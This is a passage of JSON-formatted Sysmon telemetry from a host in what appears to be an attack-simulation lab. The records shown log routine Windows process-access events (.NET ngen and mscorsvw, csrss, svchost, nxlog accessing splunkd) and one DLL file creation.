07:01:05.731","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010B0BF0B00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.731\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010B0BF0B00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.731","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010B0BF0B00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.731\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010B0BF0B00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.731","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010B0BF0B00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.809\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00103BC30B00}\r\nTargetProcessId: 3512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.809","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00103BC30B00}","TargetProcessId":"3512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.809\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00103BC30B00}\r\nTargetProcessId: 3512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.809","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00103BC30B00}","TargetProcessId":"3512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.825\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-00103BC30B00}\r\nTargetProcessId: 3512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.825","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-00103BC30B00}","TargetProcessId":"3512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:06.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:06.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:07.090\r\nProcessGuid: {E2A3D6B1-1331-5F25-0000-00103BC30B00}\r\nProcessId: 3512\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\db8-0\\Microsoft.CSharp.dll\r\nCreationUtcTime: 2020-08-01 07:01:07.090","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:07.090","ProcessGuid":"{E2A3D6B1-1331-5F25-0000-00103BC30B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\db8-0\\Microsoft.CSharp.dll","CreationUtcTime":"2020-08-01 07:01:07.090","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.137\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CC710B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.137","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CC710B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft